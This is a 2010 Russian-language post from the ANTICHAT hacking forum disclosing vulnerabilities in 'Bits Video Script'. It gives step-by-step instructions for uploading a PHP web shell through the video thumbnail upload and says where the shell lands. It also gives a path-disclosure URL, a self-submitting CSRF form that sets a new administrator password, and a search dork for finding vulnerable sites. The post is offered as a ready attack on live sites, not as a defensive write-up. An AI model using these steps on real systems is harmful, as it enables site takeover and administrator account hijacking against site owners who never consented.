HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Перезагрузить страницу Уязвимости Bits Video Script
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимости Bits Video Script
  #1  
Старый 29.04.2010, 20:49
seofilms
Участник форума
Регистрация: 27.05.2009
Сообщений: 115
С нами: 8925319

Репутация: 97
По умолчанию Уязвимости Bits Video Script
Заливка шелла без прав админа :

Заходим на сайт, регистрируемся : сайт/register.php, входим со своим логином и паролем, заходим сюда : сайт/addvideo.php там где thumbs выбираем свой шелл и заливаем его.
После заливки он находится здесь : cайт/thumbs/имявашегошелла.php



Видео о том как залить шелл : http://www.youtube.com/watch?v=v6AOwLg1v3w



Раскрытие путей :
PHP код:
сайт/search.php?search[]=way&searchsubmit
csrf уязвимость

PHP код:
<form method=post action="http://сайт/admin/password.php" onsubmit="return checkform(this);" name="csrf"
<input type='text' name='password' value="НОВЫЙ ПАРОЛЬ КОТОРЫЙ ВЫ ПОСТАВИТЕ АДМИНИСТРАТОРУ">
</form
<script
document.csrf.submit();
</script
Поисковой запрос

PHP код:
inurl:search.php?order=views 
(C)forum.kidal.org
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось seofilms; 29.04.2010 в 21:06..
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Проблемы со звуком? Звуковой картой? Драйверами? ) spy-prof "Железо" 24 18.04.2009 02:35
Куча скриптов =)) SK | Heaton PHP 37 01.02.2008 15:23
Pубрика "Полезные решения на PHP" Utochka PHP 28 23.05.2006 10:06
Новый Мултиплеер для GTA:VC - vc-mp xSp1D3R Болталка 5 16.08.2005 02:20



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.